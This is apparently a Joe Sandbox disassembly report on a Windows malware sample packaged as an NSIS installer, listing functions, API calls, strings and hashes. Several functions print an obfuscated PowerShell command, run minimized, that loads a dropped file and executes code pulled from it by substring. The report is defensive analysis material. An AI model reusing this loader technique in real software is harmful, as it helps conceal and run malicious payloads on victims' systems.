Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
Instruction ID: d05ccde32c27ce198b4ddd6d941ac6fef01cdbbca41556c28887b76fd68ddc7b
Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
Instruction Fuzzy Hash: 0AE0CD3290411167C320AB749D44E3B73ACAFC5750305483DF506F2151D734AC11E7AD

Function 00405FF5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,00421548,00421100,004058B2,00421100,00421100,00000000,00421100,00421100,?,?,771B2EE0,004055D1,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406000
FindClose.KERNEL32(00000000), ref: 0040600C

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
Instruction ID: a10b3c54e235fed7265b7e368dd63080585aa0dd988869772eea30aa6a37580d
Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
Instruction Fuzzy Hash: 2DD012319590306BC3105F786D0C85B7A589B993317618A33B466F62F0C7388D629AE9

Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402654

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 94cf938a9d0ff6ef35911b7a4d07d04fb574dedb7636cc3958d2f67a1536c597
Instruction ID: e095c2a4769a5e18af137d5e24cc0f066a76803936003d94c8e443da5dd33856
Opcode Fuzzy Hash: 94cf938a9d0ff6ef35911b7a4d07d04fb574dedb7636cc3958d2f67a1536c597
Instruction Fuzzy Hash: 58F0EC72508110EBD700E77499499EE7778DF51314F60457BF141F21C1D3B84941EB2A

Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
ShowWindow.USER32(?), ref: 00403B72
DestroyWindow.USER32 ref: 00403B86
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
GetDlgItem.USER32(?,?), ref: 00403BC3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
IsWindowEnabled.USER32(00000000), ref: 00403BDE
GetDlgItem.USER32(?,00000001), ref: 00403C8C
GetDlgItem.USER32(?,00000002), ref: 00403C96
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
GetDlgItem.USER32(?,00000003), ref: 00403DA7
ShowWindow.USER32(00000000,?), ref: 00403DC8
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
EnableWindow.USER32(?,?), ref: 00403DF5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
EnableMenuItem.USER32(00000000), ref: 00403E12
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
lstrlenA.KERNEL32(reckling: Installing,?,reckling: Installing,00422F00), ref: 00403E66
SetWindowTextA.USER32(?,reckling: Installing), ref: 00403E75
ShowWindow.USER32(?,0000000A), ref: 00403FA9

Strings

reckling: Installing, xrefs: 00403E52, 00403E5C, 00403E65, 00403E73

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: reckling: Installing
API String ID: 3282139019-1062532133
Opcode ID: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
Opcode Fuzzy Hash: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E

Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

lstrcatA.KERNEL32(1033,reckling: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,reckling: Installing,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3410,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",00000000), ref: 00403802
lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,1033,reckling: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,reckling: Installing,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403877
lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
GetFileAttributesA.KERNEL32(004226A0), ref: 00403895
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\supersystem\panelet), ref: 004038DE

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

RegisterClassA.USER32(00422EA0), ref: 0040391B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
ShowWindow.USER32(00000005,00000000), ref: 0040399E
LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
RegisterClassA.USER32(00422EA0), ref: 004039E0
DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004037BB
1033, xrefs: 004037A7, 004037FD
_Nb, xrefs: 004038FA, 00403962
RichEd32, xrefs: 004039B5
.DEFAULT\Control Panel\International, xrefs: 004037ED
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403793
RichEd20, xrefs: 004039AA
.exe, xrefs: 00403884
RichEdit, xrefs: 004039D1
C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 00403811, 00403819, 004038B1, 004038B7, 004038C7
RichEdit20A, xrefs: 004039C2, 004039C8
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 0040378B
reckling: Installing, xrefs: 004037B3, 004037B9, 004037DE, 004037E7, 004037FC

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Nt8BLNLKN7.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\supersystem\panelet$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$reckling: Installing
API String ID: 914957316-2933452629
Opcode ID: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
Opcode Fuzzy Hash: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E

Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C8D
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Nt8BLNLKN7.exe,00000400), ref: 00402CA9

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Nt8BLNLKN7.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nt8BLNLKN7.exe,C:\Users\user\Desktop\Nt8BLNLKN7.exe,80000000,00000003), ref: 00402CF2
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39

Strings

C:\Users\user\Desktop\Nt8BLNLKN7.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
Inst, xrefs: 00402D60
Error launching installer, xrefs: 00402CC9
soft, xrefs: 00402D69
Null, xrefs: 00402D72
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 00402C79

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Nt8BLNLKN7.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nt8BLNLKN7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-122199236
Opcode ID: f8b3b9eff59f9593db0cf7fefcc0c5331fae69f0157aa5f548c26de072740380
Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
Opcode Fuzzy Hash: f8b3b9eff59f9593db0cf7fefcc0c5331fae69f0157aa5f548c26de072740380
Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Grammofonpladerne,C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Grammofonpladerne,Grammofonpladerne,00000000,00000000,Grammofonpladerne,C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155, xrefs: 0040176C
%machinates%\vatter\udkastelses.Bss116, xrefs: 00401789, 004017F8, 00401816
incarnations\Vaporized\hippogriff, xrefs: 0040180C, 00401828
Grammofonpladerne, xrefs: 0040175B, 00401764, 00401783, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) , xrefs: 004017F3, 004017FF, 00401817

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) $%machinates%\vatter\udkastelses.Bss116$C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155$Grammofonpladerne$incarnations\Vaporized\hippogriff
API String ID: 1941528284-3399107345
Opcode ID: f81b4b0a62f07454d43e24b26e3037c1c7dc23f8998e09d171ce13397913933d
Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
Opcode Fuzzy Hash: f81b4b0a62f07454d43e24b26e3037c1c7dc23f8998e09d171ce13397913933d
Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D

Function 00404FDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000), ref: 00405038
SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "), ref: 0040504A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Strings

Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ", xrefs: 00404FFC, 0040500E, 00405014, 00405037, 00405043

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "
API String ID: 2531174081-618076394
Opcode ID: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
Opcode Fuzzy Hash: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000), ref: 00405038
